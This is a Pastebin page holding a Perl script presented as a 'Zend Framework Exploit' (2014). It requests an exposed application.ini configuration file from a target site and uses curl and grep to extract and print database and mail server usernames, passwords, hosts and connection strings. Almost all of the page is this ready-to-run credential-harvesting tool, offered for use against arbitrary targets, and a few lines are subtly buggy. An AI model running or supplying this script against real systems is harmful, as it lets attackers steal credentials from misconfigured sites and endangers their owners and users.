Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- </pre>
- <pre>#!/usr/bin/perl
- # Zend Framework Exploit.
- # By KoubackTr
- # koubacktr@gmail.com
- # https://koubacktr.wordpress.com/
- #=====================================================================#
- # This script exploits a vulnerability in the Zend Framework #
- # Through the exposure of the configuration file "application.ini" #
- #=====================================================================#
- # Este script explora uma vulnerabilidade no Zend Framework #
- # Atravez da exposição do arquivo de configuração "application.ini" #
- #=====================================================================#
- # Status: Em teste e adaptação // In test and adaptation
- # Libs
- use strict;
- use LWP::UserAgent;
- use Getopt::Long;
- use Config;
- use Term::ANSIColor;
- my $os=$Config{osname};
- if($os=="linux"){
- }else{
- print "Ohh, this software run only in linux systems. [DIE]\n";
- die;
- }
- print color 'bold cyan';
- print '
- __________ .___ ____ ___ .__ ____ __
- \____ /____ ____ __| _/ ____ \ \/ /_____ | | ____/_ |/ |_
- / // __ \ / \ / __ | _/ __ \ \ /\____ \| | / _ \| \ __\
- / /\ ___/| | \/ /_/ | \ ___/ / \| |_> > |_( <_> ) || |
- /_______ \___ >___| /\____ | \___ >___/\ \ __/|____/\____/|___||__|
- \/ \/ \/ \/ \/ \_/__|
- by KoubackTr || https://koubacktr.wordpress.com/
- ';
- print color 'reset';
- my ($target, $zend_path);
- my $options = GetOptions(
- 't=s'=> \$target,
- 'p=s'=> \$zend_path,
- );
- unless($target){
- print color 'yellow';
- print "\t\t\t[!] Please, set a Zend target!\n";
- print "\t\t\tUse EX: $0 -t <target> -p <zend/path/>\n\n";
- exit;
- print color 'reset';
- }
- unless($zend_path){
- my $zend_path="/";
- }
- my $APP="application.ini";
- my $PATH="application/configs";
- my $URL="http://$target/$zend_path/$PATH/$APP"; #// make a complete URL of application.ini
- my $u = LWP::UserAgent->new;
- my $req = HTTP::Request->new(GET => $URL);
- my $resposta = $u->request($req);
- if($resposta->is_success){
- print color 'red';
- print "\t\t\t[+] TARGET IS VULNERABLE !! :)\n";
- print color 'reset';
- print "\t\t\t[+] EXPLORE DB CONFIG IN FILE... !! :)\n\n";
- #// using curl for requet application.ini
- my $db_host= `curl -s "$URL" | grep 'db.params.host'`;
- my $db_adapter=`curl -s "$URL" | grep 'db.adapter' `;
- my $db_user=`curl -s "$URL" | grep '.db.params.username' `;
- my $db_pass=`curl -s "$URL" | grep '.db.params.password' `;
- my $db_name=`curl -s "$URL" | grep 'db.params.dbname' `;
- my $db_geral=`curl -s "$URL"| grep 'connection_string' `;
- #// Return and print config data
- print color 'cyan';
- print "\t$db_adapter \n";
- print "\t$db_host \n";
- print "\t$db_user \n";
- print "\t$db_pass \n";
- print "\t$db_name \n";
- print "\n$db_geral \n";
- print color 'reset';
- print "\n";
- print "\t\t\t[+] EXPLORE MAIL CONFIG IN FILE... !! :)\n\n";
- my $mail_type=`curl -s "$URL" | grep 'mail.transport.type' `;
- my $mail_host= `curl -s "$URL" | grep 'mail.transport.host'`;
- my $mail_port=`curl -s "$URL" | grep 'mail.transport.port' `;
- my $mail_user=`curl -s "$URL" | grep '.mail.transport.username' `;
- my $mail_pass=`curl -s "$URL" | grep 'mail.transport.password' `;
- print color 'cyan';
- print "\t$mail_type \n";
- print "\t$mail_host \n";
- print "\t$mail_port \n";
- print "\t$mail_user \n";
- print "\t$mail_pass \n";
- print color 'reset';
- print "\n\n END!\n";
- # Make a new request for get new lines and configuration of file. :p
- # ...
- }
- else{
- #// The target is not vulnerable, sorry
- print color 'bold green';
- print "\t\t\t\n[!] TARGET IS NOT VULNERABLE😦 (BYE)\n\n";
- print color 'reset';
- }
- # END #
- #
- # KoubackTr - 2014 http://twitter.com/kouback_tr_
- # irc.anonnet.org 6667 #Loc
- #</pre>
- <pre>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement